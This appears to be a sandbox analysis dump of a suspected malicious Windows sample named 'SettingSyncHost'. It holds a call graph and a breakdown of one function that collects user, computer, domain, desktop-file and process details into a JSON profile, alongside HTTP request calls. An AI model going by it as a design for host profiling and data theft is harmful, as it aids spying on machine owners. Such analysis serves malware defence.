3e5cdf 34864->34865 34864->34868 34874 3e3ffb 13 API calls __dosmaperr 34865->34874 34867 3e5ce5 GetLastError 34867->34868 34868->34842 34869->34848 34870->34845 34871->34855 34872->34857 34873->34858 34874->34867 34878 3cefee _Yarn 34875->34878 34880 3cf014 34875->34880 34876 3cf0fe 35159 3ca560 26 API calls 2 library calls 34876->35159 34878->34702 34879 3cf103 35160 3ca4c0 26 API calls 2 library calls 34879->35160 34880->34876 34882 3cf08d 34880->34882 34883 3cf068 34880->34883 34885 3d8ed5 std::_Facet_Register 26 API calls 34882->34885 34888 3cf079 _Yarn 34882->34888 34883->34879 34886 3d8ed5 std::_Facet_Register 26 API calls 34883->34886 34884 3cf108 std::ios_base::_Ios_base_dtor 34884->34702 34885->34888 34886->34888 34889 3cf0e0 std::ios_base::_Ios_base_dtor 34888->34889 35158 3de23f 24 API calls 2 library calls 34888->35158 34889->34702 34891 3d1616 34890->34891 34891->34891 34893 3d162e _Yarn 34891->34893 35161 3d16f0 26 API calls 4 library calls 34891->35161 34893->34704 34895 3cabb6 34894->34895 34896 3cabbd 34895->34896 34897 3cac11 34895->34897 34898 3cabf2 34895->34898 34896->34719 34901 3d8ed5 std::_Facet_Register 26 API calls 34897->34901 34902 3cac06 _Yarn 34897->34902 34899 3cac49 34898->34899 34900 3cabf9 34898->34900 35162 3ca4c0 26 API calls 2 library calls 34899->35162 34904 3d8ed5 std::_Facet_Register 26 API calls 34900->34904 34901->34902 34902->34719 34905 3cabff 34904->34905 34905->34902 35163 3de23f 24 API calls 2 library calls 34905->35163 34910 3d8eda 34908->34910 34911 3d8ef4 34910->34911 34913 3d8ef6 34910->34913 35164 3df7d5 34910->35164 35173 3e0c80 EnterCriticalSection std::_Facet_Register 34910->35173 34911->34736 34914 3ca4c0 Concurrency::cancel_current_task 34913->34914 34915 3d8f00 Concurrency::cancel_current_task 34913->34915 35171 3db5c4 RaiseException 34914->35171 35174 3db5c4 RaiseException 34915->35174 34918 3ca4dc 35172 3db34c 25 API calls 2 library calls 34918->35172 34919 3d9723 34921 3ca503 34921->34736 34923 3cbb69 __fread_nolock 34922->34923 35177 3cdcc0 34923->35177 34926 3df7d5 ___std_exception_copy 14 API calls 34927 3cbba8 34926->34927 34928 3cbbb7 34927->34928 34929 3cbbe3 GetAdaptersInfo 34927->34929 34932 3cefd0 26 API calls 34928->34932 34930 3cbbf6 34929->34930 34931 3cbc42 GetAdaptersInfo 34929->34931 35201 3df6c0 34930->35201 34943 3cbcd0 34931->34943 34951 3cbc58 34931->34951 34938 3cbbde 34932->34938 34935 3df6c0 std::locale::_Locimp::~_Locimp 13 API calls 34935->34938 34936 3df7d5 ___std_exception_copy 14 API calls 34936->34951 34937 3df7d5 ___std_exception_copy 14 API calls 34940 3cbc07 34937->34940 35182 3cd2f0 34938->35182 34940->34931 34942 3cbc16 34940->34942 34946 3cefd0 26 API calls 34942->34946 34943->34935 34946->34938 34948 3d01b0 26 API calls 34950 3cbd35 34948->34950 34949 3cefd0 26 API calls 34949->34951 34952 3d0f30 26 API calls 34950->34952 34951->34936 34951->34943 34951->34949 34953 3df6c0 std::locale::_Locimp::~_Locimp 13 API calls 34951->34953 35204 3cb050 43 API calls 34951->35204 34955 3cbd56 std::ios_base::_Ios_base_dtor 34952->34955 34953->34951 34954 3cbeb4 35205 3de23f 24 API calls 2 library calls 34954->35205 34955->34954 34959 3cbde6 std::ios_base::_Ios_base_dtor 34955->34959 34956 3cbe8a 35198 3cbec0 34956->35198 34959->34956 34961 3cefd0 26 API calls 34959->34961 34961->34956 34962 3cbe95 34963 3d8ec4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34962->34963 34964 3cbeae 34963->34964 34964->34745 35343 3cac60 34965->35343 34967 3ca792 std::ios_base::_Ios_base_dtor 34967->34751 34968 3ca607 34968->34967 35358 3de23f 24 API calls 2 library calls 34968->35358 34972 3cd2f0 27 API calls 34971->34972 34973 3cbfe8 34972->34973 35362 3ccab0 34973->35362 34976 3cc049 34978 3cefd0 26 API calls 34976->34978 34977 3cc06e 34979 3cefd0 26 API calls 34977->34979 34978->34977 34980 3cc0b4 34979->34980 34981 3cc0e4 std::ios_base::_Ios_base_dtor 34980->34981 34984 3cca9e 34980->34984 35378 3cceb0 34981->35378 35404 3de23f 24 API calls 2 library calls 34984->35404 34985 3cc160 34985->34985 34988 3cefd0 26 API calls 34985->34988 34987 3ccaa3 35405 3de23f 24 API calls 2 library calls 34987->35405 34990 3cc17c GetComputerNameExA 34988->34990 34993 3cc1c4 34990->34993 34991 3ccaa8 35406 3de23f 24 API calls 2 library calls 34991->35406 34993->34993 34995 3cefd0 26 API calls 34993->34995 34996 3cc1e0 34995->34996 34997 3cc210 __fread_nolock 34996->34997 34998 3cefd0 26 API calls 34996->34998 34999 3cdcc0 68 API calls 34997->34999 34998->34997 35000 3cc238 34999->35000 35001 3d01b0 26 API calls 35000->35001 35002 3cc24c 35001->35002 35003 3d01b0 26 API calls 35002->35003 35004 3cc25c 35003->35004 35005 3d0f30 26 API calls 35004->35005 35006 3cc27d 35005->35006 35007 3d01b0 26 API calls 35006->35007 35008 3cc289 35007->35008 35009 3d01b0 26 API calls 35008->35009 35010 3cc299 35009->35010 35011 3d0f30 26 API calls 35010->35011 35012 3cc2ba 35011->35012 35013 3d01b0 26 API calls 35012->35013 35014 3cc2c6 35013->35014 35015 3d01b0 26 API calls 35014->35015 35016 3cc2d6 35015->35016 35017 3d0f30 26 API calls 35016->35017 35018 3cc2f7 35017->35018 35019 3d01b0 26 API calls 35018->35019 35020 3cc306 35019->35020 35021 3d01b0 26 API calls 35020->35021 35041 3cc316 35021->35041 35022 3cc3ed 35023 3d01b0 26 API calls 35022->35023 35024 3cc3fd 35023->35024 35025 3d01b0 26 API calls 35024->35025 35046 3cc40d 35025->35046 35026 3d01b0 26 API calls 35026->35041 35027 3cc4ec 35028 3d01b0 26 API calls 35027->35028 35029 3cc4fc 35028->35029 35030 3d01b0 26 API calls 35029->35030 35031 3cc50c 35030->35031 35032 3cc534 35031->35032 35033 3cc515 35031->35033 35035 3cefd0 26 API calls 35032->35035 35034 3cab90 26 API calls 35033->35034 35036 3cc527 35034->35036 35035->35036 35037 3d01b0 26 API calls 35036->35037 35038 3cc58f 35037->35038 35042 3d0f30 26 API calls 35038->35042 35039 3d01b0 26 API calls 35039->35046 35040 3d0f30 26 API calls 35040->35041 35041->35022 35041->35026 35041->35040 35043 3cc5a3 35042->35043 35044 3d01b0 26 API calls 35043->35044 35050 3cc5b2 std::ios_base::_Ios_base_dtor 35044->35050 35045 3d0f30 26 API calls 35045->35046 35046->35027 35046->35039 35046->35045 35047 3d01b0 26 API calls 35049 3cc699 35047->35049 35048 3cc66b std::ios_base::_Ios_base_dtor 35048->35047 35051 3d01b0 26 API calls 35049->35051 35050->34987 35050->35048 35052 3cc6a2 35051->35052 35053 3d01b0 26 API calls 35052->35053 35054 3cc6ae 35053->35054 35055 3d01b0 26 API calls 35054->35055 35056 3cc6be 35055->35056 35057 3d01b0 26 API calls 35056->35057 35058 3cc6ce 35057->35058 35059 3d01b0 26 API calls 35058->35059 35060 3cc6de 35059->35060 35061 3d01b0 26 API calls 35060->35061 35063 3cc6ee 35061->35063 35062 3cc77c 35064 3cefd0 26 API calls 35062->35064 35066 3cc7ae std::ios_base::_Ios_base_dtor 35062->35066 35063->35062 35065 3cefd0 26 API calls 35063->35065 35064->35066 35065->35062 35066->34991 35067 3cbec0 24 API calls 35066->35067 35071 3cc88f std::ios_base::_Ios_base_dtor 35067->35071 35068 3cca71 std::ios_base::_Ios_base_dtor 35069 3d8ec4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35068->35069 35070 3cca98 35069->35070 35070->34712 35070->34762 35071->34991 35071->35068 35073 3d0e4e 35072->35073 35074 3d0e96 _Yarn 35072->35074 35075 3d0ea4 35073->35075 35076 3d0e82 35073->35076 35074->34766 35075->35074 35081 3d8ed5 std::_Facet_Register 26 API calls 35075->35081 35077 3d0e89 35076->35077 35078 3d0ef5 35076->35078 35080 3d8ed5 std::_Facet_Register 26 API calls 35077->35080 35435 3ca4c0 26 API calls 2 library calls 35078->35435 35082 3d0e8f 35080->35082 35081->35074 35082->35074 35436 3de23f 24 API calls 2 library calls 35082->35436 35092 3d35f9 35091->35092 35094 3d360d _Yarn 35092->35094 35437 3d09d0 26 API calls 4 library calls 35092->35437 35094->34770 35096 3d79ed 35095->35096 35097 3d7b7a 35096->35097 35098 3d7aba 35096->35098 35105 3d79f2 _Yarn 35096->35105 35438 3ca560 26 API calls 2 library calls 35097->35438 35101 3d7aef 35098->35101 35102 3d7b15 35098->35102 35100 3d7b7f 35439 3ca4c0 26 API calls 2 library calls 35100->35439 35101->35100 35104 3d7afa 35101->35104 35107 3d8ed5 std::_Facet_Register 26 API calls 35102->35107 35113 3d7b07 _Yarn 35102->35113 35106 3d8ed5 std::_Facet_Register 26 API calls 35104->35106 35105->34785 35109 3d7b00 35106->35109 35107->35113 35109->35113 35440 3de23f 24 API calls 2 library calls 35109->35440 35113->34785 35116 3d1338 35115->35116 35117 3d12db HttpOpenRequestA 35115->35117 35116->34723 35116->34795 35117->35116 35119 3d1312 HttpSendRequestW 35117->35119 35121 3d135d InternetCloseHandle 35119->35121 35122 3d1331 InternetCloseHandle 35119->35122 35121->35116 35122->35116 35125 3d01f1 35124->35125 35126 3cee70 26 API calls 35125->35126 35130 3d023c 35126->35130 35127 3cb9c0 26 API calls 35128 3d03cc 35127->35128 35129 3d03e4 35128->35129 35441 3cfe00 26 API calls 35128->35441 35132 3cdfe0 35129->35132 35130->35127 35133 3cee70 26 API calls 35132->35133 35134 3ce01e 35133->35134 35137 3ce04c 35134->35137 35442 3d0640 35134->35442 35135 3cb9c0 26 API calls 35138 3ce10b 35135->35138 35137->35135 35139 3ce123 35138->35139 35457 3cfe00 26 API calls 35138->35457 35139->34811 35141->34774 35142->34804 35143->34810 35145 3d8ecd 35144->35145 35146 3d8ecf IsProcessorFeaturePresent 35144->35146 35145->34759 35148 3d952f 35146->35148 35460 3d94f2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 35148->35460 35150 3d9612 35150->34759 35153->34716 35155->34723 35159->34879 35160->34884 35161->34893 35162->34905 35169 3e5cf9 __Getctype 35164->35169 35165 3e5d37 35176 3e3ffb 13 API calls __dosmaperr 35165->35176 35167 3e5d22 RtlAllocateHeap 35168 3e5d35 35167->35168 35167->35169 35168->34910 35169->35165 35169->35167 35175 3e0c80 EnterCriticalSection std::_Facet_Register 35169->35175 35171->34918 35172->34921 35173->34910 35174->34919 35175->35169 35176->35168 35206 3cfee0 35177->35206 35325 3db630 35182->35325 35184 3cd320 gethostname 35185 3cd350 35184->35185 35185->35185 35186 3cefd0 26 API calls 35185->35186 35187 3cd368 35186->35187 35188 3d8ec4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35187->35188 35189 3cbd0d 35188->35189 35190 3d0f30 35189->35190 35191 3d0f77 35190->35191 35327 3cee70 35191->35327 35193 3cb9c0 26 API calls 35195 3d1110 35193->35195 35194 3cbd29 35194->34948 35195->35194 35335 3cfe00 26 API calls 35195->35335 35337 3cd930 35198->35337 35200 3cbf08 std::ios_base::_Ios_base_dtor 35200->34962 35202 3e5cbf _free 13 API calls 35201->35202 35203 3cbbfc 35202->35203 35203->34937 35204->34951 35224 3cb9c0 35206->35224 35208 3cff59 35209 3d8ed5 std::_Facet_Register 26 API calls 35208->35209 35210 3cff60 35209->35210 35233 3d9fcd 35210->35233 35212 3cff77 35243 3d0030 35212->35243 35214 3cfff0 35217 3cdd75 35214->35217 35260 3da1e7 7 API calls 2 library calls 35214->35260 35216 3cb9c0 26 API calls 35216->35214 35219 3cfd30 35217->35219 35220 3d8ed5 std::_Facet_Register 26 API calls 35219->35220 35221 3cfd6a 35220->35221 35222 3d9fcd std::locale::_Init 41 API calls 35221->35222 35223 3cbb77 35222->35223 35223->34926 35225 3cb9da 35224->35225 35226 3cb9e2 35224->35226 35228 3cb9f2 35225->35228 35261 3db5c4 RaiseException 35225->35261 35226->35208 35262 3db5c4 RaiseException 35228->35262 35230 3cba37 35263 3db34c 25 API calls 2 library calls 35230->35263 35232 3cba64 35232->35208 35234 3d9fd9 std::locale::_Init 35233->35234 35264 3d9dea 35234->35264 35238 3d9ff7 35271 3da155 38 API calls std::locale::_Setgloballocale 35238->35271 35239 3da015 std::_Lockit::~_Lockit std::locale::_Init 35239->35212 35241 3d9fff 35272 3d9f25 14 API calls 3 library calls 35241->35272 35244 3d9dea std::_Lockit::_Lockit 7 API calls 35243->35244 35245 3d007e 35244->35245 35246 3d9dea std::_Lockit::_Lockit 7 API calls 35245->35246 35248 3d00a0 std::_Lockit::~_Lockit 35245->35248 35246->35248 35247 3d0105 std::_Lockit::~_Lockit 35249 3d8ec4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35247->35249 35248->35247 35250 3d8ed5 std::_Facet_Register 26 API calls 35248->35250 35251 3cffa8 35249->35251 35252 3d0110 35250->35252 35251->35214 35251->35216 35275 3cb580 35252->35275 35256 3d0156 35285 3cb630 63 API calls 3 library calls 35256->35285 35258 3d0168 35286 3d9f9b 26 API calls std::_Facet_Register 35258->35286 35260->35217 35261->35228 35262->35230 35263->35232 35265 3d9df9 35264->35265 35266 3d9e00 35264->35266 35273 3e3673 6 API calls std::_Lockit::_Lockit 35265->35273 35268 3d9dfe 35266->35268 35274 3da842 EnterCriticalSection 35266->35274 35268->35239 35270 3da132 26 API calls 2 library calls 35268->35270 35270->35238 35271->35241 35272->35239 35273->35268 35274->35268 35276 3d9dea std::_Lockit::_Lockit 7 API calls 35275->35276 35277 3cb5b0 35276->35277 35278 3cb5f8 35277->35278 35279 3cb616 35277->35279 35287 3da0cd 35278->35287 35296 3d9d9d 26 API calls 2 library calls 35279->35296 35284 3da34c 37 API calls __Getctype 35284->35256 35285->35258 35286->35247 35297 3e38df 35287->35297 35291 3da0f1 35292 3da101 35291->35292 35293 3e38df std::_Locinfo::_Locinfo_ctor 63 API calls 35291->35293 35303 3d9f25 14 API calls 3 library calls 35292->35303 35293->35292 35295 3cb5ff 35295->35284 35304 3e91f1 35297->35304 35299 3e38ec 35300 3e368a std::_Locinfo::_Locinfo_ctor 63 API calls 35299->35300 35301 3da0d9 35300->35301 35302 3d9f25 14 API calls 3 library calls 35301->35302 35302->35291 35303->35295 35305 3e8ba4 std::_Lockit::_Lockit 5 API calls 35304->35305 35306 3e91f6 35305->35306 35307 3e8bbe std::_Lockit::_Lockit 5 API calls 35306->35307 35308 3e91fb 35307->35308 35309 3e8bd8 std::_Lockit::_Lockit 5 API calls 35308->35309 35310 3e9200 35309->35310 35311 3e8bf2 std::_Lockit::_Lockit 5 API calls 35310->35311 35312 3e9205 35311->35312 35313 3e8c0c std::_Lockit::_Lockit 5 API calls 35312->35313 35314 3e920a 35313->35314 35315 3e8c26 std::_Lockit::_Lockit 5 API calls 35314->35315 35316 3e920f 35315->35316 35317 3e8c40 std::_Lockit::_Lockit 5 API calls 35316->35317 35318 3e9214 35317->35318 35319 3e8c5a std::_Lockit::_Lockit 5 API calls 35318->35319 35320 3e9219 35319->35320 35321 3e8c8e std::_Lockit::_Lockit 5 API calls 35320->35321 35322 3e921e 35321->35322 35323 3e8c74 std::_Lockit::_Lockit 5 API calls 35322->35323 35324 3e9223 35323->35324 35324->35324 35326 3db647 35325->35326 35326->35184 35326->35326 35328 3ceeaf 35327->35328 35329 3cee70 26 API calls 35328->35329 35331 3ceeca 35328->35331 35330 3ceefd 35329->35330 35332 3cef2a 35330->35332 35333 3cb9c0 26 API calls 35330->35333 35331->35193 35332->35331 35336 3cfe00 26 API calls 35332->35336 35333->35332 35335->35194 35336->35331 35338 3cd97a std::ios_base::_Ios_base_dtor 35337->35338 35339 3cd93f 35337->35339 35338->35200 35339->35338 35342 3de23f 24 API calls 2 library calls 35339->35342 35346 3cac7e __fread_nolock 35343->35346 35348 3caca7 35343->35348 35344 3cad93 35360 3ca560 26 API calls 2 library calls 35344->35360 35346->34968 35347 3cad98 35361 3ca4c0 26 API calls 2 library calls 35347->35361 35348->35344 35350 3cad1e 35348->35350 35351 3cacfb 35348->35351 35353 3d8ed5 std::_Facet_Register 26 API calls 35350->35353 35356 3cad0c __fread_nolock 35350->35356 35351->35347 35354 3d8ed5 std::_Facet_Register 26 API calls 35351->35354 35352 3cad9d 35353->35356 35354->35356 35357 3cad75 std::ios_base::_Ios_base_dtor 35356->35357 35359 3de23f 24 API calls 2 library calls 35356->35359 35357->34968 35360->35347 35361->35352 35372 3ccb26 std::ios_base::_Ios_base_dtor __fread_nolock 35362->35372 35363 3ccd9e 35422 3cd380 35363->35422 35365 3ccded 35366 3d8ec4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35365->35366 35367 3cc010 SHGetFolderPathA 35366->35367 35367->34976 35367->34977 35368 3cdcc0 68 API calls 35368->35372 35369 3cdfe0 66 API calls 35369->35372 35370 3cbec0 24 API calls 35370->35372 35371 3cab90 26 API calls 35371->35372 35372->35363 35372->35368 35372->35369 35372->35370 35372->35371 35373 3cefd0 26 API calls 35372->35373 35374 3cce0c 35372->35374 35407 3d0420 35372->35407 35373->35372 35427 3de23f 24 API calls 2 library calls 35374->35427 35379 3cd2de 35378->35379 35380 3ccf37 35378->35380 35433 3ca560 26 API calls 2 library calls 35379->35433 35382 3d0e10 26 API calls 35380->35382 35384 3ccf57 FindFirstFileA 35382->35384 35383 3cd2e3 35434 3de23f 24 API calls 2 library calls 35383->35434 35386 3ccf8f FindNextFileA 35384->35386 35387 3cd248 FindClose 35384->35387 35389 3cd242 35386->35389 35402 3ccfa7 std::ios_base::_Ios_base_dtor __fread_nolock 35386->35402 35390 3cd29b std::ios_base::_Ios_base_dtor 35387->35390 35392 3cd27d 35387->35392 35389->35387 35391 3cd380 24 API calls 35390->35391 35393 3cd2bf 35391->35393 35392->35383 35392->35390 35394 3d8ec4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35393->35394 35395 3cc11a GetUserNameA 35394->35395 35395->34985 35396 3cd230 FindNextFileA 35396->35389 35396->35402 35397 3cdcc0 68 API calls 35397->35402 35399 3cab90 26 API calls 35399->35402 35400 3cefd0 26 API calls 35400->35402 35401 3d0420 26 API calls 35401->35402 35402->35383 35402->35396 35402->35397 35402->35399 35402->35400 35402->35401 35403 3cbec0 24 API calls 35402->35403 35432 3cde60 66 API calls 35402->35432 35403->35402 35408 3d062b 35407->35408 35409 3d0475 35407->35409 35429 3caff0 26 API calls std::_Xinvalid_argument 35408->35429 35410 3d0626 35409->35410 35413 3d04ca 35409->35413 35414 3d04f1 35409->35414 35428 3ca4c0 26 API calls 2 library calls 35410->35428 35413->35410 35416 3d04d5 35413->35416 35419 3d8ed5 std::_Facet_Register 26 API calls 35414->35419 35421 3d04db 35414->35421 35418 3d8ed5 std::_Facet_Register 26 API calls 35416->35418 35418->35421 35419->35421 35420 3d05f6 std::ios_base::_Ios_base_dtor 35420->35372 35421->35420 35430 3de23f 24 API calls 2 library calls 35421->35430 35423 3cd3d6 std::ios_base::_Ios_base_dtor 35422->35423 35424 3cd38a 35422->35424 35423->35365 35424->35423 35431 3de23f 24 API calls 2 library calls 35424->35431 35428->35408 35432->35402 35433->35383 35435->35082 35437->35094 35438->35100 35439->35109 35441->35129 35443 3d9dea std::_Lockit::_Lockit 7 API calls 35442->35443 35444 3d067b 35443->35444 35445 3d9dea std::_Lockit::_Lockit 7 API calls 35444->35445 35447 3d069b std::_Lockit::~_Lockit 35444->35447 35445->35447 35446 3d06f9 std::_Lockit::~_Lockit 35448 3d8ec4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35446->35448 35447->35446 35449 3d8ed5 std::_Facet_Register 26 API calls 35447->35449 35450 3d0788 35448->35450 35451 3d0704 35449->35451 35450->35137 35452 3cb580 66 API calls 35451->35452 35453 3d0734 35452->35453 35458 3cb630 63 API calls 3 library calls 35453->35458 35455 3d0749 35459 3d9f9b 26 API calls std::_Facet_Register 35455->35459 35457->35139 35458->35455 35459->35446 35460->35150 35461 391200 35465 39124a 35461->35465 35462 39126f 35463 3931a1 27 API calls 35462->35463 35464 391510 35463->35464 35465->35462 35466 391491 CreateActCtxA 35465->35466 35467 3931a1 27 API calls 35466->35467 35468 3914aa 35467->35468 35468->35462 35469 3914e6 ActivateActCtx 35468->35469 35470 3931a1 27 API calls 35469->35470 35470->35462 35471 391070 35472 3910b6 35471->35472 35477 3910b1 35471->35477 35473 3910c3 LoadLibraryA 35472->35473 35472->35477 35478 391117 35472->35478 35475 3931a1 27 API calls 35473->35475 35474 3931a1 27 API calls 35476 3911a1 35474->35476 35475->35472 35477->35474 35478->35472 35479 39114a GetProcAddress 35478->35479 35480 391124 GetProcAddress 35478->35480 35482 3931a1 27 API calls 35479->35482 35481 3931a1 27 API calls 35480->35481 35481->35478 35482->35478 35483 3930e0 GetLocalTime 35484 3931a1 27 API calls 35483->35484 35485 39311b 35484->35485 35486 39312b 35485->35486 35493 3931c4 27 API calls _RTC_StackFailure 35486->35493 35488 39313c 35494 393c21 5 API calls __call_reportfault 35488->35494 35490 39314b 35491 3931a1 27 API calls 35490->35491 35492 393158 35491->35492 35493->35488 35494->35490 35495 3d9354 35500 3d9aba SetUnhandledExceptionFilter 35495->35500 35497 3d9359 35501 3e353f 24 API calls 2 library calls 35497->35501 35499 3d9364 35500->35497 35501->35499 35502 3922c0 35505 3922fb _memmove 35502->35505 35503 3924f0 VirtualProtect 35504 3931a1 27 API calls 35503->35504 35506 392516 35504->35506 35505->35503 35511 3931c4 27 API calls _RTC_StackFailure 35506->35511 35508 392553 35509 3931a1 27 API calls 35508->35509 35510 392565 35509->35510 35511->35508

                                                                                                                                      Executed Functions

                                                                                                                                      Function 003CBF90, Relevance: 40.9, APIs: 3, Strings: 20, Instructions: 691COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 240 3cbf90-3cc047 call 3cd2f0 call 3ccab0 SHGetFolderPathA 245 3cc049-3cc04f 240->245 246 3cc074-3cc091 240->246 247 3cc052-3cc057 245->247 248 3cc098-3cc09d 246->248 247->247 249 3cc059-3cc06e call 3cefd0 247->249 248->248 250 3cc09f-3cc0bb call 3cefd0 248->250 249->246 255 3cc0bd-3cc0ce 250->255 256 3cc0ee-3cc159 call 3cceb0 GetUserNameA 250->256 258 3cc0e4-3cc0eb call 3d8f05 255->258 259 3cc0d0-3cc0de 255->259 264 3cc160-3cc165 256->264 258->256 259->258 261 3cca9e call 3de23f 259->261 267 3ccaa3 call 3de23f 261->267 264->264 266 3cc167-3cc1bd call 3cefd0 GetComputerNameExA 264->266 273 3cc1c4-3cc1c9 266->273 271 3ccaa8-3ccaaf call 3de23f 267->271 273->273 275 3cc1cb-3cc1fc call 3cefd0 273->275 278 3cc1fe-3cc210 call 3cefd0 275->278 279 3cc217-3cc32c call 3db630 call 3cdcc0 call 3d01b0 * 2 call 3d0f30 call 3d01b0 * 2 call 3d0f30 call 3d01b0 * 2 call 3d0f30 call 3d01b0 * 2 275->279 278->279 308 3cc3ed-3cc421 call 3d01b0 * 2 279->308 309 3cc332 279->309 322 3cc4ec-3cc513 call 3d01b0 * 2 308->322 323 3cc427-3cc42a 308->323 311 3cc335-3cc337 309->311 313 3cc339-3cc349 call 3d01b0 311->313 314 3cc34b 311->314 315 3cc352-3cc379 call 3d01b0 * 2 313->315 314->315 332 3cc37d-3cc3ad call 3d0f30 call 3d01b0 * 2 315->332 333 3cc37b 315->333 342 3cc534-3cc56e call 3cefd0 322->342 343 3cc515-3cc532 call 3cab90 322->343 326 3cc430-3cc432 323->326 329 3cc434-3cc444 call 3d01b0 326->329 330 3cc446 326->330 331 3cc44d-3cc474 call 3d01b0 * 2 329->331 330->331 353 3cc478-3cc4a8 call 3d0f30 call 3d01b0 * 2 331->353 354 3cc476 331->354 361 3cc3af 332->361 362 3cc3b1-3cc3e7 call 3d0f30 call 3d01b0 * 2 332->362 333->332 352 3cc573-3cc595 call 3d01b0 342->352 343->352 363 3cc599-3cc5c1 call 3d0f30 call 3d01b0 352->363 364 3cc597 352->364 378 3cc4ac-3cc4e6 call 3d0f30 call 3d01b0 * 2 353->378 379 3cc4aa 353->379 354->353 361->362 362->308 362->311 381 3cc627-3cc630 363->381 382 3cc5c3-3cc5d5 363->382 364->363 378->322 378->326 379->378 385 3cc675-3cc725 call 3d01b0 * 7 381->385 386 3cc632-3cc644 381->386 387 3cc60c-3cc620 382->387 388 3cc5d7-3cc5e6 382->388 416 3cc74c-3cc74f 385->416 417 3cc727-3cc731 385->417 386->385 390 3cc646-3cc655 386->390 387->381 392 3cc5fc-3cc609 call 3d8f05 388->392 393 3cc5e8-3cc5f6 388->393 395 3cc66b-3cc672 call 3d8f05 390->395 396 3cc657-3cc665 390->396 392->387 393->267 393->392 395->385 396->267 396->395 419 3cc77c-3cc7ac 416->419 420 3cc751-3cc75b 416->420 417->416 418 3cc733-3cc74a 417->418 421 3cc76f-3cc777 call 3cefd0 418->421 423 3cc7ae-3cc7c1 419->423 424 3cc7c3-3cc7e4 call 3cefd0 419->424 420->419 422 3cc75d-3cc76d 420->422 421->419 422->421 428 3cc7e9-3cc838 423->428 424->428 429 3cc869-3cc898 call 3cbec0 428->429 430 3cc83a-3cc849 428->430 437 3cc8c9-3cc8ed 429->437 438 3cc89a-3cc8a9 429->438 431 3cc85f-3cc866 call 3d8f05 430->431 432 3cc84b-3cc859 430->432 431->429 432->271 432->431 439 3cc91e-3cc93b 437->439 440 3cc8ef-3cc8fe 437->440 441 3cc8bf-3cc8c6 call 3d8f05 438->441 442 3cc8ab-3cc8b9 438->442 445 3cc93d-3cc945 439->445 446 3cc9a0-3cc9a9 439->446 443 3cc914-3cc91b call 3d8f05 440->443 444 3cc900-3cc90e 440->444 441->437 442->271 442->441 443->439 444->271 444->443 452 3cc959-3cc980 445->452 453 3cc947-3cc957 call 3cce20 445->453 449 3cc9da-3cc9e2 446->449 450 3cc9ab-3cc9ba 446->450 457 3cc9e4-3cc9ec 449->457 458 3cca45-3cca4e 449->458 454 3cc9bc-3cc9ca 450->454 455 3cc9d0-3cc9d7 call 3d8f05 450->455 460 3cc996-3cc99d call 3d8f05 452->460 461 3cc982-3cc990 452->461 453->452 454->271 454->455 455->449 465 3cc9ee 457->465 466 3cca02-3cca29 457->466 462 3cca7b-3cca9b call 3d8ec4 458->462 463 3cca50-3cca5f 458->463 460->446 461->271 461->460 470 3cca71-3cca78 call 3d8f05 463->470 471 3cca61-3cca6f 463->471 474 3cc9f0-3cca00 call 3cce20 465->474 475 3cca3b-3cca42 call 3d8f05 466->475 476 3cca2b-3cca39 466->476 470->462 471->271 471->470 474->466 475->458 476->271 476->475
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003CD2F0: gethostname.WS2_32(?,00000100), ref: 003CD32F
                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,?,?,982F9315), ref: 003CC03F
                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 003CC136
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000002,?,?,?,?), ref: 003CC19A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Name$ComputerFolderPathUsergethostname
                                                                                                                                      • String ID: ", $"adinfo": {$"adinformation":"$"desktop_file_list": [$"domain": "$"file": "$"host":"$"name": "$"part_of_domain":"$"pc_dns_host_name":"", $"pc_domain":"", $"pc_model":""$"pid": "$"processes": [$"size": "$"user":"$WORKGROUP$] ,$no_ad$yes
                                                                                                                                      • API String ID: 1741200219-1158698074
                                                                                                                                      • Opcode ID: ea08f525fa1bec5efc8ad9493c889806cd8ef590e95504350233d86fb963a921
                                                                                                                                      • Instruction ID: c9ad999da57cc90f38aa3e9f86c822c1c673d77f1ab6d593de2600cb672e6bfe
                                                                                                                                      • Opcode Fuzzy Hash: ea08f525fa1bec5efc8ad9493c889806cd8ef590e95504350233d86fb963a921
                                                                                                                                      • Instruction Fuzzy Hash: AA52BF71A102198BDB2BEB24DD59BADB776AF85300F1081EDE109AB381DB749F85CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

